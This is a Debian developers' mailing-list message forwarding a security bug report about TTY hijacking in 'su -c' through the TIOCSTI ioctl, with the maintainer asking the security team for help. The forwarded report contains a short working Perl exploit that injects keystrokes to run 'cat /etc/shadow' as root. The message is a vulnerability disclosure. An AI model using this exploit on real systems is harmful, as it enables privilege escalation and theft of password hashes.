[Pkg-shadow-devel] Bug#628843: (forw) Bug#628843: login: tty hijacking possible in "su" via TIOCSTI ioctl
Christian PERRIER
bubulle at debian.org
Thu Jun 2 05:34:59 UTC 2011
tags 628843 help security
thanks
Security team, I need advice and help here. My co-maintainer for
shadow, Nicolas, is more or less MIA, so I'm left nearly alone to
maintain shadow. As Nicolas was also upstream, you understand how
desperate is my situation..:-)
(maybe this bug will ring a bell for Nicolas, still)
My expertise is, as you may expect, way outreached. So, in short, what
I need is someone with enough expertise to look at this bug report and
help deciding if adopting Redhat's patch is correct (assuming it
applies: I'm not sure that RH is using the same "su" than we do).
Mail CC'ed to submitter, too, so that Daniel also knows that the only
person who answers....needs help..:-)
----- Forwarded message from Daniel Ruoso <daniel at ruoso.com> -----
Date: Wed, 1 Jun 2011 15:24:47 -0400
From: Daniel Ruoso <daniel at ruoso.com>
To: Debian Bug Tracking System <submit at bugs.debian.org>
Subject: [Pkg-shadow-devel] Bug#628843: login: tty hijacking possible in "su" via TIOCSTI ioctl
Reply-To: Daniel Ruoso <daniel at ruoso.com>, 628843 at bugs.debian.org
X-CRM114-Status: Good ( pR: 39.0933 )
Package: login
Version: 1:4.1.4.2+svn3283-2+squeeze1
Severity: critical
After investigating why RedHat have a different behavior regarding "su -c" I
found out that there was a patch in RedHat to prevent tty hijacking when using
"su -c".
What makes the hijacking possible is that "su -c" still gives the command a
controlling tty, which means it has ioctl access to /dev/tty. This means it
can send things to the tty input buffer, which will be read just after su
ends.
The original report (with patch) on RedHat (from 2005?!?!?!) is:
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=173008
A very simple exploit follows (Perl code)
____BEGIN_CODE____
#!/usr/bin/perl
require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, 'cat /etc/shadow'.$/) {
ioctl($tty_fh, &TIOCSTI, $c);
}
____END_CODE____
The scenario is:
Root runs a command as a less priviledged user with "su -c", if the user was
compromised, the script will be able to run commands as root by injecting
keystrokes on the terminal.
-- System Information:
Debian Release: 6.0.1
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages login depends on:
ii libc6 2.11.2-10 Embedded GNU C Library: Shared lib
ii libpam-modules 1.1.1-6.1 Pluggable Authentication Modules f
ii libpam-runtime 1.1.1-6.1 Runtime support for the PAM librar
ii libpam0g 1.1.1-6.1 Pluggable Authentication Modules l
login recommends no packages.
login suggests no packages.
-- no debconf information
_______________________________________________
Pkg-shadow-devel mailing list
Pkg-shadow-devel at lists.alioth.debian.org
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-shadow-devel
----- End forwarded message -----
--
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 836 bytes
Desc: Digital signature
URL: <http://lists.alioth.debian.org/pipermail/pkg-shadow-devel/attachments/20110602/8dbb81c9/attachment.pgp>
More information about the Pkg-shadow-devel
mailing list